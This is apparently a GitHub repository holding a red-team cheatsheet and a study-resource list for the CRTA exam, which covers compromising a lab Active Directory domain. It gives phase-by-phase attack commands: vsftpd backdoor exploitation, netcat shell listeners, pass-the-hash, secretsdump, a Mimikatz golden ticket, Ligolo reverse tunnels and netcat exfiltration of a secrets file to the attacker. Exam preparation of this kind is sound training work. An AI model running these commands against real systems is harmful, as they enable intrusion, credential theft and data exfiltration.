├── README.md ├── resources.md └── CRTA.md /README.md: -------------------------------------------------------------------------------- 1 | This is a cheatsheet of commands and processes to compromise an Active Directory environment. Everything documented in this repository is based on my own experience with the CRTA exam, and the context and circumstances may vary. For educational purposes only. 2 | 3 | 4 | 🔴 CRTA - Certified Read Team Analyst (Exam) 🔴 5 | 6 | The Certified Red Team Analyst (CRTA) is a 48-hour hands-on exam simulating a real-world red team engagement inside an Active Directory environment. 7 | 8 | You’ll have: 9 | 10 | ⏱ 24 hours to perform the attack: 11 | 12 | Enumerate the network 13 | 14 | Gain access 15 | 16 | Pivot between hosts 17 | 18 | Escalate privileges 19 | 20 | Locate and exfiltrate the main target: secrets.xml 21 | 22 | 🕐 24 additional hours to submit your report: 23 | 24 | Include screenshots, command outputs, and a clear attack path 25 | 26 | Explain your techniques, tools, and how you achieved objectives 27 | 28 | The report quality is critical — it determines your pass/fail 29 | 30 | Goal: Simulate a stealthy red team operation against AD, showing not just technical skill but also professional documentation. 31 | -------------------------------------------------------------------------------- /resources.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ## 📚 Resources to Learn Active Directory And Mastering The CRTA EXAM 5 | 6 | ### 1. Microsoft Official Documentation 7 | - [Active Directory Documentation](https://learn.microsoft.com/en-us/windows-server/identity/active-directory-domain-services) 8 | *Comprehensive official guides on AD architecture, administration, and features.* 9 | 10 | ### 2. Hack The Box Academy (Free Courses) 11 | - [Active Directory (Full Module)](https://academy.hackthebox.com/course/preview/active-directory) 12 | - [Active Directory LDAP (Free)](https://academy.hackthebox.com/course/preview/active-directory-ldap) 13 | - [Active Directory PowerView (Free)](https://academy.hackthebox.com/course/preview/active-directory-powerview) 14 | - [Active Directory BloodHound (Free)](https://academy.hackthebox.com/course/preview/active-directory-bloodhound) 15 | *Hands-on modules focusing on AD enumeration and attack paths.* 16 | 17 | ### 3. TryHackMe (Free Rooms) 18 | - [Active Directory Fundamentals](https://tryhackme.com/room/activedirectoryfundamentals) 19 | - [BloodHound & AD Enumeration](https://tryhackme.com/room/bloodhound) 20 | *Interactive labs with step-by-step guides and practical exercises.* 21 | 22 | ### 4. YouTube Channels & Playlists 23 | - **IppSec** – Excellent walkthroughs of HTB AD machines 24 | - **John Hammond** – Tutorials on AD exploitation and post-exploitation 25 | - **NetworkChuck** – Basics and practical AD explanations 26 | 27 | ### 5. Blog Tutorials 28 | - [Adsecurity.org](https://adsecurity.org/?cat=7) – In-depth AD attack techniques and tutorials by Sean Metcalf 29 | - [PentestLab](https://pentestlab.blog/category/active-directory/) – Practical AD pentesting labs and guides 30 | 31 | ### 6. Tools Documentation 32 | - [PowerView (PowerShell AD Enumeration)](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 33 | - [BloodHound](https://bloodhound.readthedocs.io/en/latest/) 34 | 35 | ## 🧩 Windows Active Directory Machines for CRTA Practice (Easy–Medium) 36 | 37 | Here’s a curated list of Hack The Box machines that simulate Active Directory environments. All are ranked **Easy** or **Medium**, making them ideal for CRTA preparation. 38 | 39 | --- 40 | 41 | ### 🟢 Easy 42 | 43 | | Machine Name | Link | Focus | 44 | |--------------|------|-------| 45 | | 🧠 Active | [HTB – Active](https://app.hackthebox.com/machines/9) | Basic AD enumeration, password reuse, SAM database | 46 | | 🕵️‍♂️ Escape | [HTB – Escape](https://app.hackthebox.com/machines/501) | Token impersonation, privilege abuse | 47 | | 🧰 Escape Two | [HTB – Escape Two](https://app.hackthebox.com/machines/548) | Services abuse, lateral movement | 48 | | 🧮 Resolute | [HTB – Resolute](https://app.hackthebox.com/machines/152) | Password reuse, enum4linux, WinRM access | 49 | 50 | --- 51 | 52 | ### 🟡 Medium 53 | 54 | | Machine Name | Link | Focus | 55 | |--------------|------|-------| 56 | | 🛠 Support | [HTB – Support](https://app.hackthebox.com/machines/467) | Credential dumping, enumeration, RCE | 57 | | 🗂 Cascade | [HTB – Cascade](https://app.hackthebox.com/machines/221) | LDAP abuse, file share traversal, escalation | 58 | | 🧾 Manager | [HTB – Manager](https://app.hackthebox.com/machines/358) | AD CS abuse, certificate auth, escalation to Domain Admin | 59 | 60 | --- 61 | 62 | ### ✅ Recommendation 63 | 64 | Complete them in this order for a smooth learning curve. Be sure to: 65 | - Document each step with screenshots. 66 | - Practice enumeration and lateral movement. 67 | - Aim to extract secrets like `secrets.xml` on each machine. 68 | 69 | 70 | By @blindma1den 71 | 72 | -------------------------------------------------------------------------------- /CRTA.md: -------------------------------------------------------------------------------- 1 | ## 🔴 CRTA Cheatsheet 🔴 2 | 3 | ## 🧭 Phase 1 – Initial Recon (External/Perimeter) 4 | 5 | ### Context 6 | Initial reconnaissance focuses on identifying live hosts and open services in the target range to plan next steps with minimal noise. 7 | 8 | ### Techniques 9 | - Ping sweep to detect live hosts (ICMP). 10 | - Full port scan with service version detection. 11 | - Automated recon for efficiency and clean reports. 12 | 13 | ### Commands 14 | ```bash 15 | # Discover live hosts with ping sweep 16 | nmap -sn 17 | 18 | # Full port scan + version detection, output to file 19 | nmap -p- -T4 -sV -oN scan.txt 20 | 21 | # Automated recon (nmap + scripts + brute force) 22 | autorecon.py 23 | ```` 24 | 25 | ## 🔓 Phase 2 – Initial Access (Exploitation) 26 | Context: Look for exploitable vulnerabilities or misconfigurations to gain initial foothold on target machines. 27 | 28 | Techniques: 29 | - Exploit known backdoors (e.g., vsftpd 2.3.4). 30 | - Prepare listeners for reverse shells. 31 | - Search for plaintext credentials in common file locations. 32 | 33 | Commands: 34 | ```bash 35 | # Exploit vsftpd 2.3.4 backdoor using nmap script 36 | nmap --script ftp-vsftpd-backdoor.nse -p 21 37 | 38 | # Set up a listener for reverse shell 39 | nc -lnvp 40 | 41 | # Search for passwords in user directories 42 | grep -ri password /home/* 43 | Tools: 44 | 45 | nmap scripts – Automated exploit scanning. 46 | 47 | netcat (nc) – Listener and shell connections. 48 | ``` 49 | ## 🔁Phase 3 – Pivoting (Cross-Subnet Movement) 50 | 51 | Context: Use compromised hosts to access networks or subnets that are otherwise unreachable. 52 | 53 | Techniques: 54 | - Create SOCKS5 tunnels via SSH. 55 | - Use proxychains to redirect traffic through tunnels. 56 | 57 | Commands: 58 | ```bash 59 | # Establish SOCKS5 proxy tunnel 60 | ssh -D 1080 user@pivot_host 61 | 62 | # Add SOCKS5 proxy to proxychains config 63 | echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf 64 | ``` 65 | Tools: 66 | 67 | SSH – Dynamic port forwarding. 68 | 69 | proxychains – Force tools to use SOCKS5 proxy. 70 | ## 🔍 Phase 4 – Internal Recon (Windows / AD Environment) 71 | 72 | Context: Identify Domain Controllers and key services within the AD environment to prepare targeted attacks. 73 | 74 | Techniques: 75 | - Scan common DC ports (Kerberos, LDAP, SMB, GC). 76 | - Identify admin services like WinRM and RDP. 77 | 78 | Commands: 79 | ```bash 80 | # Scan typical Domain Controller ports 81 | nmap -p 88,389,636,445,3268 82 | 83 | # Full port and service version scan 84 | nmap -p- -sV -T4 85 | ``` 86 | Tools: 87 | 88 | nmap 89 | 90 | ## 🧑‍💻 Phase 5 – Abuse Web Interfaces / Internal Panels 91 | 92 | Context: Gain access to internal admin web panels (e.g., Webmin, Cockpit) via tunneled browsing and escalate privileges. 93 | 94 | Techniques: 95 | - Access web interfaces through proxychains tunnels. 96 | - Escalate privileges with sudo if possible. 97 | 98 | Commands: 99 | ```bash 100 | # Browse internal web services 101 | proxychains firefox http://: 102 | 103 | # Privilege escalation if sudo permitted 104 | sudo /bin/bash 105 | ``` 106 | Tools: 107 | 108 | Firefox + proxychains 109 | 110 | sudo 111 | 112 | 113 | 114 | ## 🗝️Phase 6 – Credential Extraction 115 | 116 | Context: Extract credentials or hashes for lateral movement or privilege escalation. 117 | 118 | Techniques: 119 | - Decrypt Kerberos keytab files to obtain NTLM hashes. 120 | - Dump credentials from memory or system files. 121 | 122 | Commands: 123 | ```bash 124 | # Extract NTLM hashes from .keytab files 125 | KeyTabExtract.py 126 | ``` 127 | Tools: 128 | 129 | KeyTabExtract.py 130 | 131 | Mimikatz (see Phase 9) 132 | 133 | ## 📡 Phase 7 – Lateral Movement 134 | 135 | Context: Move across the domain using obtained hashes or credentials to expand access. 136 | 137 | Techniques: 138 | - Use NTLM hashes to authenticate without passwords. 139 | - Dump stored hashes from compromised hosts. 140 | 141 | Commands: 142 | ```bash 143 | # Validate SMB access with NTLM hash 144 | crackmapexec smb -u -H 145 | 146 | # Dump hashes with secretsdump.py (Impacket) 147 | secretsdump.py 148 | ``` 149 | Tools: 150 | 151 | crackmapexec 152 | 153 | secretsdump.py (Impacket) 154 | 155 | ## 🧬 Phase 8 – Advanced Pivoting with Ligolo-ng 156 | 157 | Context: Create reversible VPN-like tunnels for persistent pivoting and routing through segmented networks. 158 | 159 | Techniques: 160 | - Run Ligolo proxy on attacker machine. 161 | - Execute Ligolo agent on victim for reverse connection. 162 | - Add routes to access internal networks via tunnel. 163 | 164 | Commands: 165 | ```bash 166 | # Start Ligolo proxy server 167 | ./proxy -selfcert 168 | 169 | # Run Ligolo agent on victim (PowerShell) 170 | agent.exe -connect :11601 -ignore-cert 171 | 172 | # Add route via Ligolo tunnel 173 | ip route add dev ligolo 174 | ``` 175 | Tools: 176 | 177 | Ligolo-ng 178 | 179 | ## 🎫 Phase 9 – Golden Ticket Attack (Persistence + Domain Admin) 180 | 181 | Context: Forge Kerberos tickets to maintain indefinite Domain Admin access. 182 | 183 | Techniques: 184 | - Clear current tickets to avoid conflicts. 185 | - Use Mimikatz to create forged Golden Tickets. 186 | 187 | Commands: 188 | ```powershell 189 | # Purge existing Kerberos tickets 190 | klist purge 191 | 192 | # Generate Golden Ticket in Mimikatz 193 | lsadump::trust /patch 194 | kerberos::golden /user:child-admin /domain:redteam.corp /sid: /krbtgt: 195 | ``` 196 | Tools: 197 | 198 | Mimikatz 199 | 200 | ## 📤 Phase 10 – Data Exfiltration 201 | 202 | Context: Find and transfer sensitive files out of the target environment. 203 | 204 | Techniques: 205 | - Search for files containing secrets. 206 | - Use netcat for stealthy file transfer. 207 | 208 | Commands: 209 | ```bash 210 | # Find files with sensitive keywords 211 | find / -type f -iname "*secret*.xml" 212 | 213 | # Listen on attacker for incoming file 214 | nc -l -p 1235 > secret.xml 215 | 216 | # Send file from victim (PowerShell) 217 | type C:\path\secret.xml | nc 1235 218 | ``` 219 | Tools: 220 | 221 | netcat 222 | ## 🧠 Summary: Mastering the Active Directory Red Team Engagement 223 | 224 | This cheat sheet is a practical guide to performing a full-scope red team operation against an Active Directory environment. Each phase builds on the previous one, and success comes from not just knowing commands—but understanding the context and adapting based on the target network. 225 | 226 | --- 227 | 228 | ### 🧭 Key Phases Overview 229 | 230 | | Phase | Goal | 231 | |-------|------| 232 | | Phase 1 | Initial Recon: Identify hosts and services externally | 233 | | Phase 2 | Initial Access: Exploit vulnerabilities or misconfigs | 234 | | Phase 3 | Pivoting: Reach internal subnets through tunnels | 235 | | Phase 4 | Internal Recon: Map the AD environment | 236 | | Phase 5 | Abuse Internal Panels: Access internal admin UIs | 237 | | Phase 6 | Credential Extraction: Extract hashes and passwords | 238 | | Phase 7 | Lateral Movement: Expand control across machines | 239 | | Phase 8 | Advanced Pivoting: Use Ligolo for robust tunneling | 240 | | Phase 9 | Golden Ticket: Achieve persistent Domain Admin access | 241 | | Phase 10 | Exfiltration: Steal and extract valuable data | 242 | 243 | --- 244 | 245 | ## 🛠️ Advice and Best Practices 246 | 247 | ### 🧠 Think Like an Attacker 248 | Don't just memorize commands—ask *why* each one is used. Understand the purpose behind every technique so you can adapt to different environments. 249 | 250 | ### 🧪 Practice in Labs 251 | Set up a lab with real Windows machines and an Active Directory domain. Use platforms like: 252 | - [HackTheBox](https://www.hackthebox.com) 253 | - [TryHackMe](https://tryhackme.com) 254 | - Your own virtual lab (e.g., AD + Kali on VirtualBox or Proxmox) 255 | 256 | ### 📸 Document Everything 257 | In real engagements and exams like CRTA, you must: 258 | - Take **screenshots** of every relevant step. 259 | - Keep terminal output logs and timestamps. 260 | - Explain *what* you did and *why*. 261 | - Create a clear **report** showing the full attack path. 262 | 263 | > 🎯 **Exam Tip:** The goal is often to extract the file `secrets.xml` or similar sensitive artifacts. Build your process around finding and exfiltrating that final objective. 264 | 265 | ### 📚 Learn the Tools 266 | Spend time learning how each tool works under the hood: 267 | - `nmap` and its scripts 268 | - `proxychains` and tunneling techniques 269 | - `crackmapexec`, `impacket`, `mimikatz` 270 | - `Ligolo-ng`, `netcat`, `autorecon` 271 | 272 | ### 📋 Take Notes 273 | During exams or engagements, keep notes of: 274 | - IPs, ports, usernames, hashes 275 | - Tools used and exact command syntax 276 | - Timeline of actions (this helps in reports) 277 | 278 | ### 🚨 Stay Quiet 279 | Avoid noisy scans. Use `-T2` timing in `nmap`, avoid default usernames, and test tools in low-noise ways first. 280 | 281 | ### 🔒 Clean Up 282 | After engagements or tests, remove any artifacts (listeners, dropped files, tickets). Don’t leave traces. 283 | 284 | --- 285 | 286 | ## ✅ Final Tip 287 | 288 | 🔁 **Repetition and real-world simulation is key.** Go through this cheat sheet repeatedly until every phase becomes second nature. The more you internalize the *why* and *how*, the better you'll perform in actual red team scenarios or exams like CRTA. 289 | 290 | Happy hacking!⚔️ 291 | 292 | By: @blindma1den 293 | 294 | 295 | --------------------------------------------------------------------------------